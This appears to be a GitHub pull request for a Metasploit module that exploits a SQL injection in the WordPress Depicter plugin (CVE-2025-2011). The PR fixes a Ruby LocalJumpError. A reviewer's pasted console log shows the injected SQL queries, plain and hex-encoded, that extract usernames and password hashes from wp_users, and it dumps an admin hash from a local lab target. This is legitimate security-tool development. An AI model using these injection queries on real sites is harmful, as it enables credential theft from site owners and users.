Skip to content

Fix auxiliary/gather/wp_depicter_sqli_cve_2025_2011 #20382

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 6 commits into
base: master
Choose a base branch
from

Conversation

Chocapikk
Copy link
Contributor

Fix LocalJumpError by replacing return with next in the create_sqli block.

Previously, using return inside the block caused an “unexpected return” error; now the block cleanly yields error constants or the extracted value.

@Chocapikk Chocapikk changed the title fix: replace return with next in get_sqli_object to prevent LocalJumpError Fix auxiliary/gather/wp_depicter_sqli_cve_2025_2011 Jul 12, 2025
@dledda-r7 dledda-r7 self-assigned this Jul 14, 2025
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

looks good.

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run                                                                                                 
[*] Running module against 127.0.0.1                                                                                                                        
[*] Running automatic check ("set AutoCheck false" to disable)                                                                                              
[*] {SQLi} Executing (select 'XtU2HH')                                                                                                                      
[*] {SQLi} Encoded to (select 0x587455324848)                                                                                                               
[+] The target is vulnerable.                                                                                                                               
[*] {SQLi} Executing (SELECT 3 FROM information_schema.tables WHERE table_name = 'wp_users')                                                                
[*] {SQLi} Encoded to (SELECT 3 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)                                                       
[*] {WPSQLi} Retrieved default table prefix: 'wp_'                                                                                                          
[*] {SQLi} Executing (select group_concat(LjnQuZKP) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) LjnQuZKP from wp_users limit 1) Qklaib)
[*] {SQLi} Encoded to (select group_concat(LjnQuZKP) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x55,0)),ifnull(user_pass,repeat(0xb8,0))) as binary) LjnQuZKP from wp_users limit 1) Qklaib)
[!] No active DB -- Credential data will not be saved!                                                                                                      
[+] {WPSQLi} Credential for user 'admin' created successfully.                                                                                              
[*] {WPSQLi} Dumped user data:                                                                                                                              
wp_users                                                                                                                                                    
========                                                                                                                                                    
                                                                                                                                                            
    user_login  user_pass                                                                                                                                   
    ----------  ---------                                                                                                                                   
    admin       $wp$2y$10$omhtu7M1pOIaaydeApWdHeRWkMkitbn2r7k53Ozif8eok9u.TGOcC                                                                             
                                                                                                                                                            
[+] Loot saved to: /home/kali/.msf4/loot/20250815095317_default_127.0.0.1_wordpress.users_600070.txt                                                        
[*] {WPSQLi} Reporting host...                                                                                                                              
[*] {WPSQLi} Reporting service...                                                                                                                           
[*] {WPSQLi} Reporting vulnerability...                                                                                                                     
[+] {WPSQLi} Reporting completed successfully.                                                                                                              
[*] Auxiliary module execution completed                                                                                                                    
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > 

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants